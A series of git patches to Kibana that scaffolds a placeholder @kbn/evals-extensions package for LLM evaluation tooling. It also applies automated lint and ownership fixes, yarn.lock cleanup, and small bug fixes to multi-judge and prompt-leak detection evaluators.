+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -0,0 +1,22 @@
+{
+  "name": "@kbn/evals-extensions",
+  "version": "1.0.0",
+  "private": true,
+  "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
+  "license": "Elastic License 2.0 OR AGPL-3.0-only OR SSPL-1.0",
+  "main": "./index.ts",
+  "scripts": {
+    "build": "echo 'No build required - types built by Kibana build system'",
+    "test": "jest"
+  },
+  "dependencies": {
+    "@kbn/evals": "link:../kbn-evals",
+    "@kbn/inference-common": "link:../../packages/private/kbn-inference-common",
+    "@kbn/scout": "link:../../../../../packages/kbn-scout",
+    "tslib": "^2.6.2"
+  },
+  "devDependencies": {
+    "@types/jest": "^29.5.5",
+    "jest": "^29.7.0"
+  }
+}
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
new file mode 100644
index 0000000000000..09f8915750984
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
@@ -0,0 +1,14 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Internal exports for @kbn/evals-extensions
+ * External API surface is defined in the root index.ts
+ */
+
+export * from './types';
+export * from './utils';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
new file mode 100644
index 0000000000000..90cd9b0eea61b
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
@@ -0,0 +1,47 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Shared types for @kbn/evals-extensions
+ *
+ * NOTE: This package depends on @kbn/evals but @kbn/evals does NOT depend on this package.
+ * Keep types that need to be shared with core @kbn/evals in @kbn/evals itself.
+ *
+ * Types here are specific to extension features and will be populated as features are added.
+ */
+
+/**
+ * Placeholder type to ensure package builds
+ * Will be replaced/extended as features are added in subsequent PRs
+ */
+export interface ExtensionPlaceholder {
+  version: string;
+  description: string;
+}
+
+/**
+ * Future type exports (to be added in subsequent PRs):
+ *
+ * PR #2: Cost tracking types
+ * - export interface CostData { ... }
+ * - export interface HyperparameterConfig { ... }
+ * - export interface EnvironmentSnapshot { ... }
+ *
+ * PR #3: Dataset management types
+ * - export interface DatasetVersion { ... }
+ * - export interface ValidationSchema { ... }
+ *
+ * PR #4: Safety evaluator types
+ * - export interface ToxicityScore { ... }
+ * - export interface PiiDetectionResult { ... }
+ *
+ * PR #5: UI component types
+ * - export interface RunComparison { ... }
+ * - export interface ExampleExplorerProps { ... }
+ *
+ * And so on for PRs #6-10...
+ */
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
new file mode 100644
index 0000000000000..7bc3109dd9887
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
@@ -0,0 +1,19 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Utility functions for @kbn/evals-extensions
+ *
+ * Will be populated in future PRs with:
+ * - Common helpers
+ * - Shared calculations
+ * - Type guards
+ * - Validation utilities
+ */
+
+// Placeholder export
+export const UTILS_VERSION = '1.0.0';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
new file mode 100644
index 0000000000000..c02e93fa3aab6
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
@@ -0,0 +1,27 @@
+{
+  "extends": "@kbn/tsconfig-base/tsconfig.json",
+  "compilerOptions": {
+    "outDir": "target/types",
+    "types": [
+      "jest",
+      "node",
+      "@kbn/ambient-common-types"
+    ]
+  },
+  "include": [
+    "**/*.ts",
+    "**/*.json"
+  ],
+  "exclude": [
+    "target/**/*"
+  ],
+  "kbn_references": [
+    "@kbn/evals",
+    "@kbn/inference-common",
+    "@kbn/scout",
+    "@kbn/dev-cli-runner",
+    "@kbn/tooling-log",
+    "@kbn/zod",
+    "@kbn/test"
+  ]
+}
diff --git a/yarn.lock b/yarn.lock
index 10353fa806595..61bd8494c4aae 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -6739,6 +6739,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
+  version "0.0.0"
+  uid ""
+
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -7183,6 +7187,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/inference-common@link:x-pack/platform/packages/packages/private/kbn-inference-common":
+  version "0.0.0"
+  uid ""
+
 "@kbn/inference-common@link:x-pack/platform/packages/shared/ai-infra/inference-common":
   version "0.0.0"
   uid ""
@@ -8403,6 +8411,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/scout@link:packages/kbn-scout":
+  version "0.0.0"
+  uid ""
+
 "@kbn/scout@link:src/platform/packages/shared/kbn-scout":
   version "0.0.0"
   uid ""

From bf1e95cd6be1b21479fbd7bedd75ff562103b606 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:05:46 +0000
Subject: [PATCH 05/15] Changes from node scripts/lint_ts_projects --fix

---
 .../packages/shared/kbn-evals-extensions/tsconfig.json      | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
index c02e93fa3aab6..f2347e8ce78ed 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
@@ -17,11 +17,5 @@
   ],
   "kbn_references": [
     "@kbn/evals",
-    "@kbn/inference-common",
-    "@kbn/scout",
-    "@kbn/dev-cli-runner",
-    "@kbn/tooling-log",
-    "@kbn/zod",
-    "@kbn/test"
   ]
 }

From 8467f10dc57a7cdba04848ecfeaa78612a4f5351 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:05:57 +0000
Subject: [PATCH 06/15] Changes from node scripts/lint_packages --fix

---
 .../platform/packages/shared/kbn-evals-extensions/package.json  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
index 5513f44c281e0..4274824638567 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -3,7 +3,7 @@
   "version": "1.0.0",
   "private": true,
   "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
-  "license": "Elastic License 2.0 OR AGPL-3.0-only OR SSPL-1.0",
+  "license": "Elastic License 2.0",
   "main": "./index.ts",
   "scripts": {
     "build": "echo 'No build required - types built by Kibana build system'",

From 29401c3ea515f753db3ba2afe8c20face15202af Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:18:27 +0000
Subject: [PATCH 07/15] Changes from node scripts/generate codeowners

---
 .github/CODEOWNERS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 25d013e6e8338..adc68fb839088 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -989,6 +989,7 @@ x-pack/platform/packages/shared/kbn-entities-schema @elastic/obs-entities
 x-pack/platform/packages/shared/kbn-es-snapshot-loader @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-common @elastic/obs-ai-team @elastic/security-generative-ai
+x-pack/platform/packages/shared/kbn-evals-extensions @elastic/kibana-obs-ai
 x-pack/platform/packages/shared/kbn-evals-phoenix-executor @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals-suite-streams @elastic/obs-onboarding-team @elastic/obs-sig-events-team
 x-pack/platform/packages/shared/kbn-event-stacktrace @elastic/obs-presentation-team @elastic/obs-exploration-team
@@ -3256,4 +3257,3 @@ x-pack/solutions/observability/plugins/synthetics/server/saved_objects/synthetic
 ####
 ## These rules are always last so they take ultimate priority over everything else
 ####
-/x-pack/platform/packages/shared/kbn-evals-extensions/ @elastic/kibana-obs-ai

From 4e51bf5bdd07db6d46b020cd37d4823c70274e60 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:18:35 +0000
Subject: [PATCH 08/15] Changes from node scripts/regenerate_moon_projects.js
 --update

---
 .../shared/kbn-evals-extensions/moon.yml      | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
new file mode 100644
index 0000000000000..b73e090886f1b
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -0,0 +1,56 @@
+# This file is generated by the @kbn/moon package. Any manual edits will be erased!
+#  To extend this, write your extensions/overrides to 'moon.extend.yml'
+#  then regenerate this file with: 'node scripts/regenerate_moon_projects.js --update --filter @kbn/evals-extensions'
+
+$schema: https://moonrepo.dev/schemas/project.json
+id: '@kbn/evals-extensions'
+layer: unknown
+owners:
+  defaultOwner: '@elastic/kibana-obs-ai'
+toolchains:
+  default: node
+  javascript:
+    rootPackageDependenciesOnly: false
+language: typescript
+project:
+  title: '@kbn/evals-extensions'
+  description: Moon project for @kbn/evals-extensions
+  channel: ''
+  owner: '@elastic/kibana-obs-ai'
+  sourceRoot: x-pack/platform/packages/shared/kbn-evals-extensions
+dependsOn:
+  - '@kbn/evals'
+tags:
+  - shared-common
+  - package
+  - prod
+  - group-undefined
+  - jest-unit-tests
+fileGroups:
+  src:
+    - '**/*.ts'
+    - '**/*.json'
+    - '!target/**/*'
+tasks:
+  jest:
+    command: node
+    args:
+      - '--no-experimental-require-module'
+      - $workspaceRoot/scripts/jest
+      - '--config'
+      - $projectRoot/jest.config.js
+    options:
+      runFromWorkspaceRoot: true
+    inputs:
+      - '@group(src)'
+  jestCI:
+    command: node
+    args:
+      - '--no-experimental-require-module'
+      - $workspaceRoot/scripts/jest
+      - '--config'
+      - $projectRoot/jest.config.js
+    options:
+      runFromWorkspaceRoot: true
+    inputs:
+      - '@group(src)'

From b459fdcc253af11efcc7b75c8f4dcbb7f7d8b197 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 25 Mar 2026 22:14:44 +0100
Subject: [PATCH 09/15] fix(evals): resolve CI failures in
 @kbn/evals-extensions

- Use `export type *` for type-only re-exports (consistent-type-exports)
- Remove redundant scripts/dependencies from package.json to fix jest
  CI reporter expecting --config arg
---
 .../shared/kbn-evals-extensions/package.json     | 16 +---------------
 .../shared/kbn-evals-extensions/src/index.ts     |  2 +-
 2 files changed, 2 insertions(+), 16 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
index 4274824638567..830ebc4dcaef2 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -4,19 +4,5 @@
   "private": true,
   "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
   "license": "Elastic License 2.0",
-  "main": "./index.ts",
-  "scripts": {
-    "build": "echo 'No build required - types built by Kibana build system'",
-    "test": "jest"
-  },
-  "dependencies": {
-    "@kbn/evals": "link:../kbn-evals",
-    "@kbn/inference-common": "link:../../packages/private/kbn-inference-common",
-    "@kbn/scout": "link:../../../../../packages/kbn-scout",
-    "tslib": "^2.6.2"
-  },
-  "devDependencies": {
-    "@types/jest": "^29.5.5",
-    "jest": "^29.7.0"
-  }
+  "main": "./index.ts"
 }
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
index 09f8915750984..e14da609f2e38 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
@@ -10,5 +10,5 @@
  * External API surface is defined in the root index.ts
  */
 
-export * from './types';
+export type * from './types';
 export * from './utils';

From 4b030275bc47217bf41b17b3e9c56519255df94b Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Wed, 25 Mar 2026 21:21:56 +0000
Subject: [PATCH 10/15] Changes from node scripts/lint.js --fix

---
 yarn.lock | 8 --------
 1 file changed, 8 deletions(-)

diff --git a/yarn.lock b/yarn.lock
index 2495b9a654753..8c24d531706e8 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -7328,10 +7328,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/inference-common@link:x-pack/platform/packages/packages/private/kbn-inference-common":
-  version "0.0.0"
-  uid ""
-
 "@kbn/inference-common@link:x-pack/platform/packages/shared/ai-infra/inference-common":
   version "0.0.0"
   uid ""
@@ -8556,10 +8552,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/scout@link:packages/kbn-scout":
-  version "0.0.0"
-  uid ""
-
 "@kbn/scout@link:src/platform/packages/shared/kbn-scout":
   version "0.0.0"
   uid ""

From 016015817efb472327ef97a4796ccaced7261310 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Wed, 25 Mar 2026 21:46:28 +0000
Subject: [PATCH 11/15] Changes from node scripts/regenerate_moon_projects.js
 --update

---
 x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
index b73e090886f1b..868ad286b50ad 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -9,8 +9,6 @@ owners:
   defaultOwner: '@elastic/kibana-obs-ai'
 toolchains:
   default: node
-  javascript:
-    rootPackageDependenciesOnly: false
 language: typescript
 project:
   title: '@kbn/evals-extensions'

From 9e096056da8ba05f1c3dbfe8c6b2dc212a86bc02 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Thu, 26 Mar 2026 22:26:43 +0100
Subject: [PATCH 12/15] fix(evals-extensions): fix jest matcher error in
 package importability test

.resolves.not.toThrow() expects a promise but received a function.
Replaced with a direct dynamic import assertion.
---
 .../shared/kbn-evals-extensions/__tests__/package.test.ts    | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
index 3415c9e23dc3a..3cad7400b2597 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
@@ -18,9 +18,8 @@ describe('@kbn/evals-extensions', () => {
     });
 
     it('should be importable without errors', async () => {
-      await expect(async () => {
-        await import('..');
-      }).resolves.not.toThrow();
+      const mod = await import('..');
+      expect(mod).toBeDefined();
     });
   });
 

From 4840a8ea224c010997e82b16a4c602dc5ad2b7e5 Mon Sep 17 00:00:00 2001
From: Garrett Spong <garrett.spong@elastic.co>
Date: Thu, 26 Mar 2026 23:23:28 -0600
Subject: [PATCH 13/15] First pass review fixes

---
 .github/CODEOWNERS                            |  2 +-
 package.json                                  |  1 -
 .../shared/kbn-evals-extensions/kibana.jsonc  |  7 +--
 .../shared/kbn-evals-extensions/moon.yml      |  8 +--
 .../src/evaluators/multi_judge/index.ts       |  2 +-
 .../src/evaluators/security/index.ts          |  2 +
 yarn.lock                                     | 54 ++-----------------
 7 files changed, 17 insertions(+), 59 deletions(-)

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 58642dac8bee8..e96482c1009c4 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -996,7 +996,7 @@ x-pack/platform/packages/shared/kbn-entities-schema @elastic/core-analysis
 x-pack/platform/packages/shared/kbn-es-snapshot-loader @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-common @elastic/obs-ai-team @elastic/security-generative-ai
-x-pack/platform/packages/shared/kbn-evals-extensions @elastic/kibana-obs-ai
+x-pack/platform/packages/shared/kbn-evals-extensions @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-phoenix-executor @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals-suite-streams @elastic/obs-onboarding-team @elastic/obs-sig-events-team
 x-pack/platform/packages/shared/kbn-event-stacktrace @elastic/obs-presentation-team @elastic/obs-exploration-team
diff --git a/package.json b/package.json
index 5448a18ada9b9..9f73cc43e0156 100644
--- a/package.json
+++ b/package.json
@@ -633,7 +633,6 @@
     "@kbn/eui-provider-dev-warning": "link:src/platform/test/plugin_functional/plugins/eui_provider_dev_warning",
     "@kbn/eval-kql": "link:src/platform/packages/shared/kbn-eval-kql",
     "@kbn/evals-common": "link:x-pack/platform/packages/shared/kbn-evals-common",
-    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-plugin": "link:x-pack/platform/plugins/shared/evals",
     "@kbn/event-annotation-common": "link:src/platform/packages/shared/kbn-event-annotation-common",
     "@kbn/event-annotation-components": "link:src/platform/packages/shared/kbn-event-annotation-components",
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
index 6f03786515b8d..fdea4cb3f5818 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
@@ -1,6 +1,7 @@
 {
-  "type": "shared-common",
+  "type": "test-helper",
   "id": "@kbn/evals-extensions",
-  "owner": ["@elastic/kibana-obs-ai"],
-  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap."
+  "owner": ["@elastic/obs-ai-team", "@elastic/security-generative-ai"],
+  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap.",
+  "devOnly": true
 }
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
index 868ad286b50ad..f07149989f299 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -6,7 +6,7 @@ $schema: https://moonrepo.dev/schemas/project.json
 id: '@kbn/evals-extensions'
 layer: unknown
 owners:
-  defaultOwner: '@elastic/kibana-obs-ai'
+  defaultOwner: '@elastic/obs-ai-team'
 toolchains:
   default: node
 language: typescript
@@ -14,14 +14,14 @@ project:
   title: '@kbn/evals-extensions'
   description: Moon project for @kbn/evals-extensions
   channel: ''
-  owner: '@elastic/kibana-obs-ai'
+  owner: '@elastic/obs-ai-team'
   sourceRoot: x-pack/platform/packages/shared/kbn-evals-extensions
 dependsOn:
   - '@kbn/evals'
 tags:
-  - shared-common
+  - test-helper
   - package
-  - prod
+  - dev
   - group-undefined
   - jest-unit-tests
 fileGroups:
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
index bc96346e1b7be..875ea488b80b0 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
@@ -60,7 +60,7 @@ export function createMultiJudgeEvaluator(config: {
       results.forEach((result, i) => {
         if (result.status === 'fulfilled') {
           judgeResults.push({ name: judges[i].name, result: result.value });
-          if (result.value.score != null) {
+          if (result.value.score != null && Number.isFinite(result.value.score)) {
             scores.push(result.value.score);
           }
         } else {
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
index cd2e744ded102..f6f8081067551 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
@@ -113,6 +113,7 @@ export function createPromptLeakDetectionEvaluator(config?: {
       const detectedPatterns: Array<{ pattern: string; location: 'text' | 'codeblock' }> = [];
 
       for (const pattern of patterns) {
+        pattern.lastIndex = 0;
         if (pattern.test(strippedPlainText)) {
           detectedPatterns.push({ pattern: pattern.source, location: 'text' });
         }
@@ -121,6 +122,7 @@ export function createPromptLeakDetectionEvaluator(config?: {
       for (const block of codeBlocks) {
         const strippedBlock = stripExcludedSegments(block);
         for (const pattern of patterns) {
+          pattern.lastIndex = 0;
           if (pattern.test(strippedBlock)) {
             detectedPatterns.push({ pattern: pattern.source, location: 'codeblock' });
           }
diff --git a/yarn.lock b/yarn.lock
index 4834031837a22..c92889f259ea6 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -2455,7 +2455,7 @@
   resolved "https://registry.yarnpkg.com/@elastic/filesaver/-/filesaver-1.1.2.tgz#1998ffb3cd89c9da4ec12a7793bfcae10e30c77a"
   integrity sha512-YZbSufYFBhAj+S2cJgiKALoxIJevqXN2MSr6Yqr42rJdaPuM31cj6pUDwflkql1oDjupqD9la+MfxPFjXI1JFQ==
 
-"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1", "d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
   version "2.0.1"
   resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
   integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
@@ -6827,10 +6827,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
-  version "0.0.0"
-  uid ""
-
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -12078,7 +12074,7 @@
   resolved "https://registry.yarnpkg.com/@readme/openapi-schemas/-/openapi-schemas-3.1.0.tgz#5ff4b704af6a8b108f9d577fd87cf73e9e7b3178"
   integrity sha512-9FC/6ho8uFa8fV50+FPy/ngWN53jaUu4GRXlAjcxIRrzhltJnpKkBG2Tp0IDraFJeWrOpk84RJ9EMEEYzaI1Bw==
 
-"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0":
+"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0", "ajv@npm:@redocly/ajv@8.18.0":
   version "8.18.0"
   resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
   integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
@@ -16096,16 +16092,6 @@ ajv@^6.12.2, ajv@^6.12.4, ajv@^6.12.5:
     json-schema-traverse "^0.4.1"
     uri-js "^4.2.2"
 
-"ajv@npm:@redocly/ajv@8.18.0":
-  version "8.18.0"
-  resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
-  integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
-  dependencies:
-    fast-deep-equal "^3.1.3"
-    fast-uri "^3.0.1"
-    json-schema-traverse "^1.0.0"
-    require-from-string "^2.0.2"
-
 anser@^2.1.1:
   version "2.3.2"
   resolved "https://registry.yarnpkg.com/anser/-/anser-2.3.2.tgz#e2da9d10759a4243a5819595f4f46ec369970c5b"
@@ -19192,11 +19178,6 @@ d3-collection@^1.0.7:
   resolved "https://registry.yarnpkg.com/d3-collection/-/d3-collection-1.0.7.tgz#349bd2aa9977db071091c13144d5e4f16b5b310e"
   integrity sha512-ii0/r5f4sjKNTfh84Di+DpztYwqKhEyUlKoPrzUFfeSkWxjW49xU2QzO9qrPrNkpdI0XJkfzvmTu8V2Zylln6A==
 
-"d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
-  version "2.0.1"
-  resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
-  integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
-
 "d3-color@1 - 3", d3-color@^3.1.0:
   version "3.1.0"
   resolved "https://registry.yarnpkg.com/d3-color/-/d3-color-3.1.0.tgz#395b2833dfac71507f12ac2f7af23bf819de24e2"
@@ -32747,7 +32728,7 @@ string-length@^4.0.1:
     char-regex "^1.0.2"
     strip-ansi "^6.0.0"
 
-"string-width-cjs@npm:string-width@^4.2.0":
+"string-width-cjs@npm:string-width@^4.2.0", string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
   version "4.2.3"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
   integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
@@ -32765,15 +32746,6 @@ string-width@^1.0.1:
     is-fullwidth-code-point "^1.0.0"
     strip-ansi "^3.0.0"
 
-string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
-  version "4.2.3"
-  resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
-  integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
-  dependencies:
-    emoji-regex "^8.0.0"
-    is-fullwidth-code-point "^3.0.0"
-    strip-ansi "^6.0.1"
-
 string-width@^5.0.1, string-width@^5.1.2:
   version "5.1.2"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-5.1.2.tgz#14f8daec6d81e7221d2a357e668cab73bdbca794"
@@ -32874,14 +32846,7 @@ stringify-object@^3.2.1:
     is-obj "^1.0.1"
     is-regexp "^1.0.0"
 
-"strip-ansi-cjs@npm:strip-ansi@^6.0.1":
-  version "6.0.1"
-  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
-  integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
-  dependencies:
-    ansi-regex "^5.0.1"
-
-strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
+"strip-ansi-cjs@npm:strip-ansi@^6.0.1", strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
   version "6.0.1"
   resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
   integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
@@ -35673,7 +35638,7 @@ workerpool@^6.5.1:
